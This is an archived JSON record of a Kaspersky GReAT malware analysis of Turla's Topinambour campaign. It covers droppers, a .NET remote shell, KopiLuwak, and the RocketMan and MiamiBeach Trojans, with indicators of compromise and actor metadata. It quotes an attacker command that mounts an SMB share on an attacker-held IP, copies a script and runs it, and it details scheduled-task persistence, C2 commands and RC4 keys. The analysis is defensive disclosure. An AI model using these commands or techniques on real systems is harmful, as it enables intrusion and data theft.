{
	"id": "0b5f846a-c88b-4e28-92fb-3d7605ae0426",
	"created_at": "2026-04-06T00:14:48.749345Z",
	"updated_at": "2026-04-10T13:11:23.853717Z",
	"deleted_at": null,
	"sha1_hash": "271a0a78250b906bdabc02c1dc53d2d4f97659c5",
	"title": "Turla renews its arsenal with Topinambour",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 249099,
	"plain_text": "Turla renews its arsenal with Topinambour\r\nBy GReAT\r\nPublished: 2019-07-15 · Archived: 2026-04-05 22:46:14 UTC\r\nTurla, also known as Venomous Bear, Waterbug, and Uroboros, is a Russian speaking threat actor known since\r\n2014, but with roots that go back to 2004 and earlier. It is a complex cyberattack platform focused predominantly\r\non diplomatic and government-related targets, particularly in the Middle East, Central and Far East Asia, Europe,\r\nNorth and South America and former Soviet bloc nations.\r\n2019 has seen the Turla actor actively renew its arsenal. Its developers are still using a familiar coding style, but\r\nthey’re creating new tools. Here we’ll tell you about several of them, namely “Topinambour” (aka Sunchoke – the\r\nJerusalem artichoke) and its related modules. We didn’t choose to name it after a vegetable; the .NET malware\r\ndevelopers named it Topinambour themselves.\r\nThe new modules were used in an active campaign that started at the beginning of 2019. As usual, the actor\r\ntargeted governmental entities. The role of the .NET module is to deliver the known KopiLuwak JavaScript\r\nTrojan. Moreover, this actor now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak.\r\nAmong the control servers there are several legitimate but compromised WordPress websites with the actor’s .php\r\nscripts on them.\r\nThis time, the developers left some Easter eggs for the targets and researchers. The .NET modules include\r\namusing strings such as “TrumpTower” as an initial vector for RC4 encryption. “RocketMan!” (probably a\r\nreference to Donald Trump’s nickname for Kim Jong Un) and “MiamiBeach” serve as the first beacon messages\r\nfrom the victim to the control server.\r\nHow Topinambour spreads\r\nTo deliver all this to targets, the operators use legitimate software installers infected with the Topinambour\r\ndropper. 
These could be tools to circumvent internet censorship, such as “Softether VPN 4.12” and “psiphon3”, or\r\nMicrosoft Office “activators”.\r\nThe dropper contains a tiny .NET shell that will wait for Windows shell commands from the operators. Using this\r\nand SMB shares on rented virtual private servers (VPS), the campaign operators spread the next-stage modules\r\nusing just “net use” and “copy” Windows shell commands. It’s hard to believe, but SMB still works through\r\npublic networks.\r\nThese campaign-related VPSs are located in South Africa. Interestingly, their external IP addresses start with\r\n“197.168”. Possibly these first two bytes are there to mimic LAN addresses that start with “192.168”. Lateral\r\nmovements in the target’s infrastructure show how familiar the campaign operators are with the IPv6 protocol.\r\nAlong with IPv4 they use the newer version for shell commands and LAN addresses.\r\nWhat Topinambour wants from the targets\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 1 of 8\n\nThe purpose of all this infrastructure and modules in JavaScript, .NET and PowerShell is to build a “fileless”\r\nmodule chain on the victim’s computer consisting of an initial small runner and several Windows system registry\r\nvalues containing the encrypted remote administration tool. The tool does all that a typical Trojan needs to\r\naccomplish: upload, download and execute files, fingerprint target systems. 
The PowerShell version of the Trojan\r\nalso has the ability to get screenshots.\r\nTrojan Command set\r\nJavaScript exit upld inst wait dwld\r\n.NET #down #upload #timeout #stop #sync\r\nPowerShell #upload #down #screen #timeout #stop #sync\r\nEven the command system in the different Trojans is quite similar\r\nInteresting technical features\r\nA plausible hypothesis for developing similar malware in different languages could be to avoid detection: if one\r\nversion is detected on the victim’s computer, the operators can try an analogue in a different language. In the table\r\nbelow, we compare Trojans in terms of encryption keys in use and initial messages to control servers.\r\nTrojan RC4 encryption key Initial beacon to C2\r\nJavaScript\r\nKopiLuwak\r\n01a8cbd328df18fd49965d68e2879433\r\n“bYVAoFGJKj7rfs1M” plus hash based upon\r\nWindows installation date\r\n.NET TrumpTower RocketMan!\r\nPowerShell TimesNewRoman MiamiBeach\r\nFor some reason, the developers prefer to entertain targets and researchers instead of randomizing strings\r\nOur analysis of the dropper is based on the sample below:\r\nSHA256 8bcf125b442f86d24789b37ce64d125b54668bc4608f49828392b5b66e364284\r\nMD5 110195ff4d7298ba9a186335c55b2d1f\r\nCompiled 2018.09.10 12:08:14 (GMT)\r\nSize 1 159 680\r\nOriginal name topinambour.exe\r\nThe dropper sample on which our analysis is based implements the following features:\r\nDropper\r\nfunction\r\nFeatures\r\nunpack_p\r\nDrops payload to %LOCALAPPDATA%/VirtualStore/certcheck.exe. The “p” in the\r\nfunction name and corresponding resource in the dropper stands for “payload”\r\nmake_some_noise Gains persistence for payload with a scheduled task that starts every 30 minutes\r\nunpack_o\r\nDrops the original application that the dropper tries to mimic (such as psiphon3) to\r\n%TEMP%/activator.exe and runs it. 
Here “o” in the function name and corresponding\r\nresource in the dropper stands for “original”\r\nThe Topinambour authors decided to name the remote shell persistence function “make_some_noise()”\r\nDropped tiny .NET remote shell\r\nThe tiny dropped application gets Windows shell commands from the C2 and silently executes them.\r\nThe Topinambour tiny .NET shell first tries to get commands from an external IP, which looks like a LAN, and then\r\ncontinues with possibly infected LAN IPs\r\nThe first DWORD (four bytes) received after a TCP request to the C2 is the data size for the following\r\ncommunication. Then the data contained in the next packets will be the Windows shell command to silently\r\nexecute the application using “cmd.exe /c”. And that’s it – straightforward, simple and useful.\r\nKopiLuwak dropper\r\nThis is where the notorious KopiLuwak comes into play. The .NET remote shell silently downloads scripts from\r\nthe C2 – from the opened SMB share on a remote CELL-C VPS in South Africa to be precise. 
“Net use” and\r\n“copy” Windows shell commands are enough to fulfil the task.\r\ncmd.exe /c net use \\\\197.168.0.247\\c$ \u003cuser_pass_here\u003e /user:administrator \u0026 copy /y\r\n\\\\197.168.0.247\\c$\\users\\public\\documents\\i.js $documents\\j.js \u0026 $documents\\j.js\r\nAs a result, the victim is infected with a KopiLuwak obfuscated JavaScript.\r\nDeobfuscated KopiLuwak dropper that puts the RC4 decryption key into the scheduler task for next-stager\r\npersistence\r\nIts functions are described in the table below:\r\nScript\r\nfunction\r\nFeatures\r\nCreate\r\nscheduler\r\ntask\r\nCreates a task with the name ProactiveScan, description “NTFS Volume Health Scan”, which\r\nruns C:\\Users\\\u003cuser_name_here\u003e\\AppData\\Roaming\\Microsoft\\Chkdsk.js with the\r\nparameters “-scan Kdw6gG7cpOSZsBeH”, where the parameter is the RC4 decryption key\r\nFingerprint\r\nhost\r\nSaves a set of commands such as systeminfo, net view, tasklist /v, gpresult /z, dir\r\n\\x22%programfiles%\\x5cKaspersky Lab\\x22, tracert www.google.com to\r\n%appdata%\\Microsoft\\x5ct235.dat\r\nDrop next\r\nJavaScript\r\nDrops C:\\Users\\\u003cuser_name_here\u003e\\AppData\\Roaming\\Microsoft\\Chkdsk.js\r\nThe dropped “Chkdsk.js” decrypts one more script using the RC4 key provided in the dropper’s scheduled task\r\nand runs the decrypted code. This final stager is a more complex Trojan, able to parse and execute custom\r\ncommands from the C2.\r\nThe operators get the victim’s data in XML format: every message has a 16-byte signature at the beginning and a\r\nvictim-specific fingerprint that the developer calls “ridid”.\r\nConstant Bytes Value and features\r\nmagic 16\r\nEvery encrypted message from the infected host starts with this. 
In the samples\r\ndescribed, the magic bytes are ‘bYVAoFGJKj7rfs1M’.\r\nridid 32\r\nHash value, based on Windows installation date and the aforementioned 16-byte magic\r\nvalue\r\nRC4 iv 32\r\nRC4 initial vector to encrypt communication between the target and the C2. In the\r\nsamples described, the IV value is “01a8cbd328df18fd49965d68e2879433”\r\nDecrypted and deobfuscated target hashing algorithm, based on Windows installation date and 16-byte hardcoded\r\nstring\r\nThe malware communicates with a legitimate compromised WordPress-based website and gets four byte length\r\ncommands from URL like “http://\u003clegitimate domain\u003e/wp-includes/Requests/Socks.php”. First, the malware\r\nbeacons to its C2 and gets the command to execute as an answer.\r\nCommand Features\r\nexit\r\nSend “t235.dat” fingerprinting file content with “upl” text in the XML message, delete the file\r\nand stop script execution\r\nupld\r\nSend “t235.dat” content with “upl” text in XML message. If no such file exists, or it’s empty, it\r\nsends “opt file no exists or size limit” text in the XML message\r\ninst\r\nCommand format is:\r\n– three bytes after command – overall server response length\r\n– three following bytes – they are “jss”\r\n– Tail – JavaScript to execute\r\nSend ‘good install’ and “t235.dat” content in the XML messages. Save executed JavaScript file\r\nas %APPDATA%\\Microsoft\\ghke94d.jss\r\nwait Do nothing\r\ndwld\r\nCommand format is the same as for the “inst” command, but the script from the server will not\r\nbe executed at once. It saves the decrypted JavaScript as %APPDATA%\\Microsoft\\awgh43.js\r\nand sends ‘success get_parse_command’ in the XML message\r\nKopiLuwak JavaScript\r\nThe downloaded script takes a binary from the Windows registry and runs it. 
The registry subkeys and values vary\r\nfrom target to target.\r\nThe slightly obfuscated script used to run the payload from registry\r\nIt is not completely clear how the registry keys were created; however, the attackers usually use the .NET initial\r\ninfector for that. In some samples, there is an additional function to get the victim’s MAC address.\r\nThis is the end of the first “JavaScript” infection chain. Now, let’s also briefly describe the second .NET-based chain.\r\n.NET RocketMan Trojan\r\nWe call this Trojan RocketMan after the string the developer uses for beaconing. Another string inside this\r\nmalware is “TrumpTower”, used as an RC4 encryption initial vector.\r\nThis malware reads the C2 IP and port from the registry where it was saved by the previous stager. It processes the\r\nfollowing commands from its C2 that are received encrypted over HTTP:\r\nCommand Features\r\n#down\r\nMake HTTP POST request to http://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/file to download the file with\r\nthe provided name to the victim’s computer\r\n#upload\r\nMake HTTP GET request to http://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/update, decrypt server response\r\nand upload the file to the server with the provided path and name\r\n#timeout Get the pause length from the server command argument and wait\r\n#stop Make HTTP GET request to http://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/exit, stop the Trojan operation\r\n#sync Send encrypted “RocketMan!” string to the server\r\nPowerShell MiamiBeach Trojan\r\nLast but not least, the developers behind the Topinambour campaign also used a PowerShell Trojan. This Trojan\r\ncontains around 450 strings and uses “TimesNewRoman” as the RC4 initial vector to encrypt C2 communications.\r\nThis module beacons to its hardcoded C2 with the string “MiamiBeach” using an HTTP POST. 
The Trojan is quite\r\nsimilar to the .NET RocketMan Trojan and can handle the same commands; additionally, it includes the “#screen”\r\ncommand to take a screenshot.\r\nConclusions\r\nThe reason behind the development of KopiLuwak’s PowerShell and .NET analogues may be simply to minimize\r\ndetection of the well-known, publicly discussed JavaScript versions. Using the Windows system registry to store\r\nencrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the\r\ndigital footprint on any victim’s computer, where only a tiny starter would be left.\r\nIt’s a bit surprising, amusing and not entirely clear why the developers have used some seemingly US-related\r\nstrings such as “RocketMan!”, “TrumpTower” or “make_some_noise”. They are hardly likely to serve as false\r\nflags. The usage of KopiLuwak, a well-known and exclusive artefact previously used by the Turla group, makes\r\nus attribute this campaign to this actor with high confidence.\r\nIndicators of compromise\r\nC2 HTTP GET templates\r\nhttp://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/file\r\nhttp://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/update\r\nhttp://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/exit\r\nSome campaign-related MD5 hashes\r\n47870ff98164155f088062c95c448783\r\n2c1e73da56f4da619c4c53b521404874\r\n6acf316fed472300fa50db54fa6f3cbc\r\n9573f452004b16eabd20fa65a6c2c1c4\r\n3772a34d1b731697e2879bef54967332\r\nd967d96ea5d0962e08844d140c2874e0\r\na80bbd753c07512b31ab04bd5e3324c2\r\n37dc2eb8ee56aeba4dbd4cf46f87ae9a\r\n710f729ab26f058f2dbf08664edb3986\r\nDomains and IPs\r\nVPSs used as control servers\r\n197.168.0.73\r\n197.168.0.98\r\n197.168.0.212\r\n197.168.0.243\r\n197.168.0.247\r\n197.168.0.250\r\nSource: 
https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/"
	],
	"report_names": [
		"91687"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434488,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/271a0a78250b906bdabc02c1dc53d2d4f97659c5.pdf",
		"text": "https://archive.orkl.eu/271a0a78250b906bdabc02c1dc53d2d4f97659c5.txt",
		"img": "https://archive.orkl.eu/271a0a78250b906bdabc02c1dc53d2d4f97659c5.jpg"
	}
}